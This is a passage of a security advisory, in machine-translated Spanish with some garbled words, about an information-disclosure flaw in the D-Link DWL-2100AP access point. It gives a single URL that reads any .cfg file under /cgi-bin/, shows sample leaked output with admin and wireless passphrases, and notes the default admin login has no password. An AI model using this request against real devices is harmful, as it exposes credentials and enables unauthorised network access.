Puntos de acceso inalámbricos

Una vulnerabilidad en el punto D-Link de acceso inalámbrico (DWL-2100AP)
Si hacemos una petición HTTP a / cgi-bin /, el servidor Web devuelve un error 404 (página no encontrada).

Si hacemos una petición HTTP para archivos como / cgi-bin/QualquerArquivo.htm, el servidor Web devuelve un error 404 (página no encontrada) .

Sin embargo, hacer una petición HTTP a cualquier archivo en el directorio / cgi-bin / con la configuración., Devolver todos los conjuntos y # 231; será el dispositivo. Por ejemplo, la siguiente petición:

http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg Nos gustaría tener un resultado equivalente a lo siguiente:

# Copyright (c) 2002 Atheros Communications, Inc., Todos los Derechos Reservados
# NO EDITAR - Este archivo de configuración se genera automáticamente
magia Ar52xxAP
FWC: 34
entrada admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_ADDR 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
contraseña IntrudersTest
contraseña
wlan1 contraseña AnewBadPassPhrase
# Varias líneas eliminado.

El punto de acceso D-Link DWL-2100AP no permiten desactivar el servidor Web, e incluso opciones para filtrar los puertos.

Es importante destacar que el punto de acceso D-Link DWL-2100AP está configurado de fábrica con el usuario y contraseña por defecto (usuario: admin y sin contraseña).

V. DETECCIÓN
-------------
Los intrusos Tigre Equipo de Seguridad confirmó la existencia de esta vulnerabilidad en todos los firmwares probado, también la 2.10na última versión.

Es posible que otros modelos-punto de acceso de D-Link pueden ser vulnerables.